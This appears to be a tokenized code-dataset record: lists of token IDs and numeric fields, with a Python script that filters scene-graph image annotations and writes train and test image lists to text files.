605, 62, 392, 19510, 22182, 13, 8937, 7, 415, 1930, 58, 45299, 15, 12962, 19841, 28498, 13, 9806, 7, 22182, 13, 8937, 7, 415, 1930, 58, 45299, 15, 60, 4008, 828, 357, 22182, 13, 8937, 7, 415, 1930, 58, 45299, 16, 12962, 1279, 28498, 13, 9806, 7, 22182, 13, 8937, 7, 415, 1930, 58, 45299, 16, 60, 35514, 198, 415, 62, 10951, 796, 28498, 13, 71, 25558, 19510, 415, 312, 58, 7295, 62, 521, 4083, 3447, 1758, 32590, 16, 11, 16, 828, 1885, 1930, 58, 7295, 62, 521, 11, 47715, 4008, 198, 77, 62, 415, 1697, 292, 796, 1885, 62, 10951, 13, 43358, 58, 15, 60, 198, 1187, 796, 17635, 198, 64, 283, 796, 15923, 13, 13217, 13713, 19182, 3419, 198, 1640, 1312, 287, 2124, 9521, 7, 77, 62, 415, 1697, 292, 2599, 198, 220, 220, 220, 1885, 796, 15923, 13, 13217, 13713, 10786, 90, 15, 25, 15, 67, 92, 4458, 18982, 7, 600, 7, 415, 62, 10951, 58, 72, 11, 15, 12962, 828, 3042, 11, 1885, 62, 10951, 58, 72, 11, 16, 25, 4357, 277, 15, 11, 36545, 12629, 28, 77, 3147, 8, 198, 220, 220, 220, 1885, 13, 69, 796, 1885, 13, 69, 15, 1343, 360, 4303, 13, 4443, 897, 7, 17, 9, 77, 3147, 11, 288, 83, 11, 6482, 28, 17821, 8, 198, 220, 220, 220, 27842, 15853, 685, 415, 60, 198, 220, 220, 220, 257, 283, 796, 257, 283, 1343, 1885, 198, 198, 16514, 395, 9430, 796, 289, 67, 377, 396, 15, 17816, 51, 3955, 6465, 2390, 3705, 6, 4083, 7890, 17816, 16514, 27823, 20520, 198, 361, 3509, 62, 77, 62, 16514, 395, 9430, 318, 6045, 25, 198, 220, 220, 220, 3509, 62, 77, 62, 16514, 395, 9430, 796, 18896, 7, 16514, 395, 9430, 8, 198, 17772, 25, 198, 220, 220, 220, 3509, 62, 77, 62, 16514, 395, 9430, 796, 949, 7, 9806, 62, 77, 62, 16514, 395, 9430, 11, 18896, 7, 16514, 395, 9430, 4008, 198, 198, 16514, 395, 9430, 796, 4628, 395, 9430, 58, 25, 9806, 62, 77, 62, 16514, 395, 9430, 60, 198, 198, 1481, 62, 66, 540, 62, 12381, 592, 796, 28498, 13, 2220, 14116, 10786, 14, 7890, 18, 14, 83, 62, 77, 342, 4121, 42509, 14, 16302, 62, 11770, 5777, 14, 7890, 14, 82, 12629, 14, 66, 540, 62, 12381, 592, 13, 14116, 3256, 14267, 8516, 28, 16, 8, 198, 415, 1697, 292, 796, 1302, 62, 66, 540, 62, 12381, 592, 58, 45299, 15, 4083, 459, 2981, 7, 22182, 13, 600, 737, 459, 2981, 7, 2536, 8, 198, 66, 540, 62, 12381, 592, 796, 1302, 62, 66, 540, 62, 12381, 592, 58, 45299, 16, 60, 198, 198, 12571, 796, 15923, 13, 9492, 2232, 15635, 19182, 7, 415, 13713, 62, 18747, 28, 64, 283, 8, 198, 198, 12571, 13, 25928, 3419, 198, 198, 9127, 796, 657, 198, 1640, 1312, 287, 2124, 9521, 7, 9806, 62, 77, 62, 16514, 395, 9430, 2599, 198, 220, 220, 220, 41033, 796, 4628, 395, 9430, 58, 72, 60, 198, 220, 220, 220, 20509, 62, 5715, 62, 19119, 62, 10951, 796, 23884, 198, 220, 220, 220, 20509, 62, 5715, 62, 19119, 62, 10951, 17816, 415, 13713, 62, 18747, 20520, 796, 23884, 198, 220, 220, 220, 20509, 62, 5715, 62, 19119, 62, 10951, 17816, 415, 13713, 62, 18747, 6, 7131, 6, 16514, 27823, 20520, 796, 41033, 198, 220, 220, 220, 20509, 62, 5715, 62, 19119, 62, 10951, 17816, 415, 1697, 292, 20520, 796, 17635, 198, 220, 220, 220, 329, 6167, 287, 1312, 283, 13, 415, 13713, 62, 18747, 13, 415, 1697, 292, 25, 198, 220, 220, 220, 220, 220, 220, 220, 512, 713, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 18242, 20520, 796, 6167, 198, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 2673, 20520, 796, 705, 4666, 1958, 6, 198, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 16514, 27823, 20520, 796, 41033, 198, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 36, 83, 20520, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 33152, 20520, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 20520, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 611, 6167, 287, 289, 67, 377, 396, 15, 58, 16514, 27823, 4083, 28665, 82, 13, 14933, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 83, 20520, 796, 28498, 13, 283, 858, 7, 77, 3147, 8, 1635, 288, 83, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 17906, 62, 47, 16, 796, 289, 67, 377, 396, 15, 58, 16514, 27823, 4083, 7890, 58, 18242, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 36, 83, 6, 7131, 6, 47, 16, 20520, 796, 17906, 62, 47, 16, 58, 45299, 15, 60, 1343, 352, 73, 1635, 17906, 62, 47, 16, 58, 45299, 16, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 33152, 6, 7131, 6, 47, 16, 20520, 796, 10352, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 25928, 20786, 62, 19503, 80, 20520, 796, 705, 9888, 6, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 86, 912, 10951, 62, 47, 16, 20520, 796, 685, 90, 6, 13989, 341, 10354, 15, 13, 15, 11, 705, 5460, 929, 10354, 26488, 7890, 18, 14, 83, 62, 77, 342, 4121, 42509, 14, 16302, 62, 11770, 5777, 14, 14323, 4817, 14, 43, 15543, 14, 7890, 14, 5460, 929, 14, 36, 62, 359, 388, 1883, 62, 271, 46084, 62, 6335, 72, 2024, 62, 5460, 929, 62, 4801, 342, 13, 14116, 6, 92, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 25928, 24396, 20520, 796, 705, 6144, 6, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 17080, 6144, 20520, 796, 657, 13, 20, 1635, 10029, 45, 2257, 13, 66, 1220, 277, 15, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 83, 349, 20520, 796, 352, 13, 15, 68, 12, 21, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 9806, 15699, 20520, 796, 352, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 6, 7131, 6, 47, 16, 20520, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 6, 7131, 6, 47, 16, 6, 7131, 6, 69, 8897, 3976, 20520, 796, 289, 67, 377, 396, 15, 17816, 37, 2200, 10917, 24181, 11015, 5357, 327, 17534, 28163, 4792, 50, 6, 4083, 7890, 17816, 35324, 20520, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 40850, 11600, 62, 47, 16, 6, 7131, 6, 12381, 592, 20520, 796, 289, 67, 377, 396, 15, 17816, 37, 2200, 10917, 24181, 11015, 5357, 327, 17534, 28163, 4792, 50, 6, 4083, 7890, 58, 18242, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 6, 7131, 6, 47, 16, 6, 7131, 6, 12381, 592, 20520, 796, 7862, 62, 12381, 592, 58, 415, 1697, 292, 6624, 6167, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 6, 7131, 6, 47, 16, 6, 7131, 6, 487, 912, 71, 21715, 20520, 796, 6407, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 33152, 6, 7131, 6, 47, 16, 20520, 796, 6407, 628, 220, 220, 220, 220, 220, 220, 220, 611, 6167, 287, 289, 67, 377, 396, 16, 58, 16514, 27823, 4083, 28665, 82, 13, 14933, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 83, 20520, 796, 28498, 13, 283, 858, 7, 77, 3147, 8, 1635, 288, 83, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 17906, 62, 47, 17, 796, 289, 67, 377, 396, 16, 58, 16514, 27823, 4083, 7890, 58, 18242, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 36, 83, 6, 7131, 6, 47, 17, 20520, 796, 17906, 62, 47, 17, 58, 45299, 15, 60, 1343, 352, 73, 1635, 17906, 62, 47, 17, 58, 45299, 16, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 33152, 6, 7131, 6, 47, 17, 20520, 796, 10352, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 25928, 20786, 62, 19503, 80, 20520, 796, 705, 9888, 6, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 86, 912, 10951, 62, 47, 17, 20520, 796, 685, 90, 6, 13989, 341, 10354, 15, 13, 15, 11, 705, 5460, 929, 10354, 26488, 7890, 18, 14, 83, 62, 77, 342, 4121, 42509, 14, 16302, 62, 11770, 5777, 14, 14323, 4817, 14, 43, 15543, 14, 7890, 14, 5460, 929, 14, 36, 62, 359, 388, 1883, 62, 271, 46084, 62, 6335, 72, 2024, 62, 5460, 929, 62, 4801, 342, 13, 14116, 6, 92, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 25928, 24396, 20520, 796, 705, 6144, 6, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 17080, 6144, 20520, 796, 657, 13, 20, 1635, 10029, 45, 2257, 13, 66, 1220, 277, 15, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 83, 349, 20520, 796, 352, 13, 15, 68, 12, 21, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 9806, 15699, 20520, 796, 352, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 6, 7131, 6, 47, 17, 20520, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 6, 7131, 6, 47, 17, 6, 7131, 6, 69, 8897, 3976, 20520, 796, 289, 67, 377, 396, 16, 17816, 37, 2200, 10917, 24181, 11015, 5357, 327, 17534, 28163, 4792, 50, 6, 4083, 7890, 17816, 35324, 20520, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 1303, 512, 713, 17816, 40850, 11600, 62, 47, 17, 6, 7131, 6, 12381, 592, 20520, 796, 289, 67, 377, 396, 16, 17816, 37, 2200, 10917, 24181, 11015, 5357, 327, 17534, 28163, 4792, 50, 6, 4083, 7890, 58, 18242, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 6, 7131, 6, 47, 17, 6, 7131, 6, 12381, 592, 20520, 796, 7862, 62, 12381, 592, 58, 415, 1697, 292, 6624, 6167, 60, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 6, 7131, 6, 47, 17, 6, 7131, 6, 487, 912, 71, 21715, 20520, 796, 6407, 198, 220, 220, 220, 220, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 512, 713, 17816, 33152, 6, 7131, 6, 47, 17, 20520, 796, 6407, 628, 220, 220, 220, 220, 220, 220, 220, 20509, 62, 5715, 62, 19119, 62, 10951, 17816, 415, 1697, 292, 20520, 15853, 685, 324, 713, 60, 628, 220, 220, 220, 220, 220, 220, 220, 1303, 611, 6167, 287, 289, 67, 377, 396, 16, 58, 16514, 27823, 4083, 28665, 82, 13, 14933, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 512, 713, 17816, 83, 20520, 796, 28498, 13, 283, 858, 7, 77, 3147, 8, 1635, 288, 83, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 17906, 62, 47, 17, 796, 289, 67, 377, 396, 16, 58, 16514, 27823, 4083, 7890, 58, 18242, 60, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 512, 713, 17816, 36, 83, 62, 47, 17, 20520, 796, 17906, 62, 47, 17, 58, 45299, 15, 60, 1343, 352, 73, 1635, 17906, 62, 47, 17, 58, 45299, 16, 60, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 512, 713, 17816, 32109, 62, 47, 17, 20520, 796, 10352, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 1303, 512, 713, 17816, 25928, 20786, 62, 19503, 80, 20520, 796, 705, 9888, 6, 220, 220, 220, 220, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 1303, 512, 713, 17816, 86, 912, 10951, 62, 47, 17, 20520, 796, 685, 90, 6, 13989, 341, 10354, 15, 13, 15, 11, 705, 5460, 929, 10354, 26488, 7890, 18, 14, 83, 62, 77, 342, 4121, 42509, 14, 16302, 62, 11770, 5777, 14, 14323, 4817, 14, 43, 15543, 14, 7890, 14, 5460, 929, 14, 36, 62, 359, 388, 1883, 62, 271, 46084, 62, 6335, 72, 2024, 62, 5460, 929, 62, 4801, 342, 13, 14116, 6, 92, 60, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 1303, 512, 713, 17816, 25928, 24396, 20520, 796, 705, 6144, 6, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 1303, 512, 713, 17816, 17080, 6144, 20520, 796, 657, 13, 20, 1635, 10029, 45, 2257, 13, 66, 1220, 277, 15, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 1303, 512, 713, 17816, 83, 349, 20520, 796, 352, 13, 15, 68, 12, 21, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 1303, 512, 713, 17816, 9806, 15699, 20520, 796, 352, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 62, 47, 17, 20520, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 62, 47, 17, 6, 7131, 6, 16104, 20520, 796, 705, 47, 17, 6, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 62, 47, 17, 6, 7131, 6, 69, 8897, 3976, 20520, 796, 289, 67, 377, 396, 15, 17816, 37, 2200, 10917, 24181, 11015, 5357, 327, 17534, 28163, 4792, 50, 6, 4083, 7890, 17816, 35324, 20520, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 1303, 512, 713, 17816, 40850, 11600, 62, 47, 17, 6, 7131, 6, 12381, 592, 20520, 796, 289, 67, 377, 396, 15, 17816, 37, 2200, 10917, 24181, 11015, 5357, 327, 17534, 28163, 4792, 50, 6, 4083, 7890, 58, 18242, 60, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 62, 47, 17, 6, 7131, 6, 12381, 592, 20520, 796, 7862, 62, 12381, 592, 58, 415, 1697, 292, 6624, 6167, 60, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 512, 713, 17816, 40850, 11600, 62, 47, 17, 6, 7131, 6, 487, 912, 71, 21715, 20520, 796, 6407, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 1303, 220, 220, 220, 220, 512, 713, 17816, 32109, 62, 47, 17, 20520, 796, 6407, 628, 220, 220, 220, 987, 2232, 15635, 62, 5715, 62, 19119, 62, 10951, 796, 23884, 198, 220, 220, 220, 987, 2232, 15635, 62, 5715, 62, 19119, 62, 10951, 17816, 3849, 2232, 40077, 20520, 796, 17635, 198, 220, 220, 220, 329, 6167, 287, 1312, 283, 13, 3849, 2232, 40077, 25, 198, 220, 220, 220, 220, 220, 220, 220, 4686, 713, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 4686, 713, 17816, 18242, 20520, 796, 6167, 198, 220, 220, 220, 220, 220, 220, 220, 4686, 713, 17816, 2673, 20520, 796, 705, 4666, 1958, 6, 198, 220, 220, 220, 220, 220, 220, 220, 4686, 713, 17816, 25928, 20786, 62, 19503, 80, 20520, 796, 705, 9888, 6, 198, 220, 220, 220, 220, 220, 220, 220, 4686, 713, 17816, 25928, 24396, 20520, 796, 705, 6144, 6, 198, 220, 220, 220, 220, 220, 220, 220, 4686, 713, 17816, 17080, 6144, 20520, 796, 657, 13, 20, 1635, 10029, 45, 2257, 13, 66, 1220, 277, 15, 198, 220, 220, 220, 220, 220, 220, 220, 4686, 713, 17816, 83, 349, 20520, 796, 352, 13, 15, 68, 12, 21, 198, 220, 220, 220, 220, 220, 220, 220, 4686, 713, 17816, 9806, 15699, 20520, 796, 352, 198, 220, 220, 220, 220, 220, 220, 220, 4686, 713, 17816, 86, 912, 10951, 20520, 796, 23884, 198, 220, 220, 220, 220, 220, 220, 220, 329, 755, 287, 37250, 47, 1157, 3256, 705, 47, 1065, 3256, 705, 47, 2481, 3256, 705, 47, 1828, 6, 5974, 198, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 220, 4686, 713, 17816, 86, 912, 10951, 6, 7131, 16104, 60, 796, 685, 90, 6, 13989, 341, 10354, 15, 13, 15, 11, 705, 5460, 929, 10354, 26488, 7890, 18, 14, 83, 62, 77, 342, 4121, 42509, 14, 16302, 62, 11770, 5777, 14, 14323, 4817, 14, 43, 15543, 14, 7890, 14, 5460, 929, 14, 36, 62, 359, 388, 1883, 62, 271, 46084, 62, 6335, 72, 2024, 62, 5460, 929, 62, 4801, 342, 13, 14116, 6, 92, 60, 198, 220, 220, 220, 220, 220, 220, 220, 987, 2232, 15635, 62, 5715, 62, 19119, 62, 10951, 17816, 3849, 2232, 40077, 20520, 15853, 685, 312, 713, 60, 220, 220, 220, 220, 628, 220, 220, 220, 1312, 283, 13, 19119, 7, 415, 13713, 62, 5715, 62, 929, 19581, 28, 415, 13713, 62, 5715, 62, 19119, 62, 10951, 11, 987, 2232, 15635, 62, 5715, 62, 929, 19581, 28, 3849, 2232, 15635, 62, 5715, 62, 19119, 62, 10951, 11, 466, 62, 10215, 2411, 378, 11639, 17213, 3256, 10730, 28, 17821, 11, 15942, 577, 28, 17821, 8, 198, 220, 220, 220, 1312, 283, 13, 25928, 62, 42946, 6442, 7, 16104, 11639, 47, 1157, 3256, 2446, 11639, 6144, 3256, 1233, 6144, 28, 15, 13, 20, 9, 4851, 45, 2257, 13, 66, 14, 69, 15, 11, 284, 75, 28, 16, 13, 15, 68, 12, 21, 11, 3509, 15699, 28, 16, 11, 10411, 62, 3849, 2232, 40077, 28, 17821, 11, 10706, 20786, 62, 19503, 80, 11639, 9888, 3256, 16855, 11639, 6551, 276, 3256, 266, 912, 62, 3803, 28, 25101, 11, 10730, 28, 17821, 11, 9788, 62, 24396, 11639, 36560, 11537, 628, 220, 220, 220, 33705, 26801, 796, 15923, 13, 3791, 5159, 7, 3849, 2232, 15635, 62, 18747, 28, 12571, 11, 755, 11639, 47, 1157, 11537, 198, 220, 220, 220, 33705, 26801, 13, 48466, 81, 7, 6551, 278, 11639, 11802, 3256, 755, 11639, 47, 1157, 11537, 628, 220, 220, 220, 611, 1312, 6624, 657, 25, 198, 220, 220, 220, 220, 220, 220, 220, 42781, 62, 9600, 796, 33705, 26801, 13, 9600, 17816, 47, 1157, 20520, 198, 220, 220, 220, 2073, 25, 198, 220, 220, 220, 220, 220, 220, 220, 42781, 62, 9600, 15853, 33705, 26801, 13, 9600, 17816, 47, 1157, 20520, 198, 198, 615, 70, 62, 9600, 1220, 28, 3509, 62, 77, 62, 16514, 395, 9430, 198, 198, 5647, 796, 9297, 51, 13, 26875, 3419, 198, 897, 796, 2336, 13, 2860, 62, 7266, 29487, 7, 16243, 8, 198, 9600, 29487, 796, 7877, 13, 320, 12860, 7, 22182, 13, 32604, 7, 615, 70, 62, 9600, 11, 16488, 28, 17, 828, 4843, 11639, 40496, 3256, 8159, 11639, 21037, 3256, 6287, 16193, 9600, 26801, 13, 25928, 75, 13, 1084, 22784, 33705, 26801, 13, 25928, 75, 13, 9806, 22784, 33705, 26801, 13, 25928, 76, 13, 1084, 22784, 33705, 26801, 13, 25928, 76, 13, 9806, 3419, 4008, 198, 2, 1426, 29487, 11, 796, 7877, 13, 29487, 7, 15688, 1930, 58, 45299, 15, 4357, 6766, 1930, 58, 45299, 16, 4357, 705, 78, 3256, 285, 16072, 11639, 23108, 3256, 502, 66, 11639, 13424, 3256, 285, 413, 28, 16, 11, 13845, 28, 23, 8, 198, 897, 13, 2617, 62, 87, 2475, 7, 9600, 26801, 13, 25928, 75, 13, 1084, 22784, 33705, 26801, 13, 25928, 75, 13, 9806, 28955, 198, 897, 13, 2617, 62, 88, 2475, 7, 9600, 26801, 13, 25928, 76, 13, 1084, 22784, 33705, 26801, 13, 25928, 76, 13, 9806, 28955, 198, 6489, 51, 13, 21928, 5647, 10786, 14, 7890, 18, 14, 83, 62, 77, 342, 4121, 42509, 14, 16302, 62, 11770, 5777, 14, 7890, 14, 82, 12629, 14, 5647, 942, 14, 17213, 62, 43, 15543, 62, 39873, 62, 9060, 23330, 15, 25, 15, 67, 92, 62, 2676, 602, 13, 11134, 4458, 18982, 7, 9806, 62, 77, 62, 16514, 395, 9430, 828, 275, 3524, 62, 45457, 28, 15, 8, 198, 5760, 33, 13, 2617, 62, 40546, 3419, 198, 6489, 51, 13, 19836, 7, 5647, 8, 198, 198, 5647, 796, 9297, 51, 13, 26875, 3419, 198, 897, 796, 2336, 13, 2860, 62, 7266, 29487, 7, 16243, 8, 198, 9600, 29487, 796, 7877, 13, 320, 12860, 7, 22182, 13, 32604, 7, 9600, 26801, 13, 40045, 17816, 47, 1157, 6, 4357, 16488, 28, 17, 828, 4843, 11639, 40496, 3256, 8159, 11639, 21037, 3256, 6287, 16193, 9600, 26801, 13, 25928, 75, 13, 1084, 22784, 33705, 26801, 13, 25928, 75, 13, 9806, 22784, 33705, 26801, 13, 25928, 76, 13, 1084, 22784, 33705, 26801, 13, 25928, 76, 13, 9806, 3419, 4008, 198, 897, 13, 2617, 62, 87, 2475, 7, 9600, 26801, 13, 25928, 75, 13, 1084, 22784, 33705, 26801, 13, 25928, 75, 13, 9806, 28955, 220, 220, 198, 897, 13, 2617, 62, 88, 2475, 7, 9600, 26801, 13, 25928, 76, 13, 1084, 22784, 33705, 26801, 13, 25928, 76, 13, 9806, 28955, 198, 6489, 51, 13, 21928, 5647, 10786, 14, 7890, 18, 14, 83, 62, 77, 342, 4121, 42509, 14, 16302, 62, 11770, 5777, 14, 7890, 14, 82, 12629, 14, 5647, 942, 14, 17213, 62, 43, 15543, 62, 862, 69, 13, 11134, 4458, 18982, 7, 270, 81, 828, 275, 3524, 62, 45457, 28, 15, 8, 198, 6489, 51, 13, 19836, 7, 5647, 8, 628 ]
2.085936
4,259
import json import os from opts import parse_opts opt = parse_opts() # prepare train.txt with open(os.path.join(opt.dataset_path, 'json_dataset','annotations_train.json'), 'r') as f: annotations = json.load(f) sg_train_images = os.listdir(os.path.join(opt.dataset_path,'sg_dataset','sg_train_images')) sg_test_images = os.listdir(os.path.join(opt.dataset_path,'sg_dataset','sg_test_images')) annotations_copy = annotations.copy() for ann in annotations.items(): if(not annotations[ann[0]] or ann[0] not in sg_train_images): annotations_copy.pop(ann[0]) with open(os.path.join(opt.dataset_path, 'train.txt'),'a') as f: for ann in annotations_copy.items(): f.write(ann[0]) f.write('\n') # prepare test.txt with open(os.path.join(opt.dataset_path, 'json_dataset','annotations_test.json'), 'r') as f: annotations = json.load(f) annotations_copy = annotations.copy() for ann in annotations.items(): if(not annotations[ann[0]] or ann[0] not in sg_test_images): annotations_copy.pop(ann[0]) with open(os.path.join(opt.dataset_path, 'test.txt'),'a') as f: for ann in annotations_copy.items(): f.write(ann[0]) f.write('\n')
[ 11748, 33918, 198, 11748, 28686, 198, 6738, 2172, 82, 1330, 21136, 62, 404, 912, 628, 198, 8738, 796, 21136, 62, 404, 912, 3419, 198, 198, 2, 8335, 4512, 13, 14116, 198, 4480, 1280, 7, 418, 13, 6978, 13, 22179, 7, 8738, 13, 19608, 292, 316, 62, 6978, 11, 705, 17752, 62, 19608, 292, 316, 41707, 34574, 602, 62, 27432, 13, 17752, 33809, 705, 81, 11537, 355, 277, 25, 198, 220, 220, 220, 37647, 796, 33918, 13, 2220, 7, 69, 8, 198, 45213, 62, 27432, 62, 17566, 796, 28686, 13, 4868, 15908, 7, 418, 13, 6978, 13, 22179, 7, 8738, 13, 19608, 292, 316, 62, 6978, 4032, 45213, 62, 19608, 292, 316, 41707, 45213, 62, 27432, 62, 17566, 6, 4008, 198, 45213, 62, 9288, 62, 17566, 796, 28686, 13, 4868, 15908, 7, 418, 13, 6978, 13, 22179, 7, 8738, 13, 19608, 292, 316, 62, 6978, 4032, 45213, 62, 19608, 292, 316, 41707, 45213, 62, 9288, 62, 17566, 6, 4008, 198, 198, 34574, 602, 62, 30073, 796, 37647, 13, 30073, 3419, 198, 1640, 1529, 287, 37647, 13, 23814, 33529, 198, 220, 220, 220, 611, 7, 1662, 37647, 58, 1236, 58, 15, 11907, 393, 1529, 58, 15, 60, 407, 287, 264, 70, 62, 27432, 62, 17566, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37647, 62, 30073, 13, 12924, 7, 1236, 58, 15, 12962, 198, 198, 4480, 1280, 7, 418, 13, 6978, 13, 22179, 7, 8738, 13, 19608, 292, 316, 62, 6978, 11, 705, 27432, 13, 14116, 33809, 6, 64, 11537, 355, 277, 25, 220, 198, 220, 220, 220, 329, 1529, 287, 37647, 62, 30073, 13, 23814, 33529, 198, 220, 220, 220, 220, 220, 220, 220, 277, 13, 13564, 7, 1236, 58, 15, 12962, 198, 220, 220, 220, 220, 220, 220, 220, 277, 13, 13564, 10786, 59, 77, 11537, 198, 198, 2, 8335, 1332, 13, 14116, 198, 4480, 1280, 7, 418, 13, 6978, 13, 22179, 7, 8738, 13, 19608, 292, 316, 62, 6978, 11, 705, 17752, 62, 19608, 292, 316, 41707, 34574, 602, 62, 9288, 13, 17752, 33809, 705, 81, 11537, 355, 277, 25, 198, 220, 220, 220, 37647, 796, 33918, 13, 2220, 7, 69, 8, 198, 198, 34574, 602, 62, 30073, 796, 37647, 13, 30073, 3419, 198, 1640, 1529, 287, 37647, 13, 23814, 33529, 198, 220, 220, 220, 611, 7, 1662, 37647, 58, 1236, 58, 15, 11907, 393, 1529, 58, 15, 60, 407, 287, 264, 70, 62, 9288, 62, 17566, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 37647, 62, 30073, 13, 12924, 7, 1236, 58, 15, 12962, 198, 198, 4480, 1280, 7, 418, 13, 6978, 13, 22179, 7, 8738, 13, 19608, 292, 316, 62, 6978, 11, 705, 9288, 13, 14116, 33809, 6, 64, 11537, 355, 277, 25, 220, 198, 220, 220, 220, 329, 1529, 287, 37647, 62, 30073, 13, 23814, 33529, 198, 220, 220, 220, 220, 220, 220, 220, 277, 13, 13564, 7, 1236, 58, 15, 12962, 198, 220, 220, 220, 220, 220, 220, 220, 277, 13, 13564, 10786, 59, 77, 11537, 628, 220, 220, 220, 220, 220, 220, 220, 220, 628, 628, 220, 220, 220, 220, 220, 220, 220, 220, 628 ]
2.378168
513
